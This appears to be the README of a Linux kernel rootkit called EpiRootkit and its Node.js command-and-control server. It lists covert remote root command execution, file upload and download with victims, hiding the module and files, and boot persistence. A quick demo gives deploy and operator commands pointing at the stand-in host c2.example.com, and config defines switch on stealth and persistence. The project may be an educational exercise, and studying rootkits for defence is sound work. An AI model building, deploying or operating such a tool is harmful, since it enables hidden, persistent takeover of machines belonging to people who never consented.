EpiRootkit Overview

Features link

• C2 Communication: TCP connection with domain support and XOR encryption
• DNS Resolution: Kernel-space domain name resolution
• Remote Commands: Execute shell commands with output capture
• File Transfer: Upload/download files between C2 and victim
• Authentication: SHA-512 password verification with rate limiting
• XOR Encryption: 32-byte key encryption for all C2 traffic
• Sysfs Interface: Linux-native configuration using octal permission system
• Stealth: Hide module from lsmod and files from directory listings
• Persistence: Multiple mechanisms to survive reboots

Quick Demo link

  # 1. Build and deploy with XOR encryption enabled
cd rootkit && make
sudo ./deploy_rootkit.sh address=c2.example.com port=443

# 2. Start C2 server  
cd attacking_program && pnpm start

# 3. Use rootkit (all communication XOR encrypted)
auth Client-1 password
# SUCCESS: Authentication successful

exec Client-1 whoami
# Exit code: 0
# Output: root

status Client-1
# EpiRootkit Status: Version 1.0.0, Module Hidden: YES, Encryption: XOR

# 4. Configure via permission bits (feature toggles)
sudo chmod 670 /sys/kernel/epirootkit/control      # group rwx = all features enabled
sudo cat /sys/kernel/epirootkit/control                  # Check status
  

Architecture link

Core Components link

• Network Layer: Connection management and DNS resolution
• Command System: Authentication and remote execution
• Stealth Features: Module and file hiding
• Persistence: Boot survival mechanisms

Communication Flow link

  C2 Server  ←→  Network/DNS  ←→  EpiRootkit  ←→  Linux Kernel
(Node.js)      (TCP/UDP)       (Module)        (System Calls)
  

Technical Stack link

• Target: Ubuntu 20.04 LTS, kernel 5.4.0, x86_64
• Language: C (kernel module) + Node.js (C2 server)
• APIs: ftrace, kretprobe, VFS, UDP sockets
• Network: TCP (C2) + UDP (DNS resolution)
• Encryption: XOR cipher with 32-byte hardcoded key
• Authentication: SHA-512 with rate limiting (5 attempts/60s)

Configuration link

Edit rootkit/core/config.h:

  #define C2_SERVER_ADDRESS "c2.example.com"  // Domain or IP
#define C2_SERVER_PORT 4444
#define ENABLE_PERSISTENCE 1       // Auto-install persistence
#define ENABLE_MODULE_HIDING 1     // Hide by default
#define ENABLE_FILE_HIDING 1       // Hide files with prefixes
  

Documentation link

• Deployment: Build and load with domain support
• Connection: Network communication and XOR encryption
• XOR Encryption: XOR encryption implementation
• DNS Resolution: Domain name resolution
• Commands: Remote command execution
• File Transfer: Upload/download files
• Stealth: Module and file hiding
• Persistence: Boot survival mechanisms